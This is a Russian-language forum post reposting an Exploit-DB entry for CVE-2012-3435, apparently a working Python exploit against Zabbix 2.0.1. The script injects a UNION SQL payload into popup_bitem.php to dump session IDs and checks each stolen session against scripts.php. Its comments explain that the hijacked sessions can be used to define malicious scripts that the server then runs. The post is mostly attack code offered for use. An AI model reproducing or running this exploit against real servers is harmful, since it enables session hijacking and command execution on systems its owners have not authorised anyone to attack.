Exploit Zabbix 2.0.1 - Session Extractor

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20087
Проверка EDB
  1. Пройдено
Автор
MUTS
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2012-3435
Дата публикации
2012-07-24
Код: 
#!/usr/bin/python

import re
import sys,urllib2,urllib

print "\n[*] Zabbix 2.0.1 Session Extractor 0day"
print "[*] http://www.offensive-security.com"
print "##################################\n"

''' 

The sessions found by this tool may allow you to access the scripts.php file.
Through this web interface, an administrator can define new malicious scripts. 
These scripts can then be called from the maps area, and executed with "zabbix" permissions.

Timeline:

17 Jul 2012: Vulnerabilty reported
17 Jul 2012: Reply received
18 Jul 2012: Issue opened: https://support.zabbix.com/browse/ZBX-5348
19 Jul 2012: Fixed for inclusion in version 2.0.2

'''

ip="172.16.164.150"

target = 'http://%s/zabbix/popup_bitem.php' % ip
url = 'http://%s/zabbix/scripts.php' % ip

def sendSql(num):
        global target
        payload="1)) union select 1,group_concat(sessionid) from sessions where userid='%s'#" % num
        payload="1 union select 1,1,1,1,1,group_concat(sessionid),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from sessions where userid='%s'#" % num
        values = {'dstfrm':'1','itemid':payload }
        url = "%s?%s" % (target, urllib.urlencode(values))  
        req = urllib2.Request(url)                          
        response = urllib2.urlopen(req)                 
        data = response.read()                  
        return data

def normal(cookie):
	global url
        req = urllib2.Request(url)
        cook = "zbx_sessionid=%s" %cookie
        req.add_header('Cookie', cook)
        response = urllib2.urlopen(req)                 
        data = response.read()                  
        if re.search('ERROR: Session terminated, re-login, please',data) or re.search('You are not logged in',data) or re.search('ERROR: No Permissions',data):
                return "FAIL"
        else:
                return "SUCCESS"

sessions=[]

for m in range(1,2):
	print "[*] Searching sessions belonging to id %s" % m
        hola=sendSql(m)
        for l in re.findall(r"([a-fA-F\d]{32})", hola):
		if l not in sessions:
			sessions.append(l)
	                print "[*] Found sessionid %s - %s" % (l,normal(l))
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Zabbix - (Authenticated) Remote Command Execution (Metasploit)
Ответы
0
Просмотры
379
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Zabbix 1.1.2 - Multiple Remote Code Execution Vulnerabilities
Ответы
0
Просмотры
340
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Zabbix 1.8.4 - 'popup.php' SQL Injection
Ответы
0
Просмотры
346
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Zabbix Agent - 'net.tcp.listen' Command Injection (Metasploit)
Ответы
0
Просмотры
328
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Zabbix 1.8.1 - SQL Injection
Ответы
0
Просмотры
311
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Zabbix 1.1x/1.4.x - File Checksum Request Denial of Service
Ответы
0
Просмотры
310
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Zabbix 1.1.4/1.4.2 - 'daemon_start' Local Privilege Escalation
Ответы
0
Просмотры
311
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Zabbix Server - Arbitrary Command Execution (Metasploit)
Ответы
0
Просмотры
301
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Zabbix Server - Multiple Vulnerabilities
Ответы
0
Просмотры
286
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Zabbix Agent < 1.6.7 - Remote Bypass
Ответы
0
Просмотры
282
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу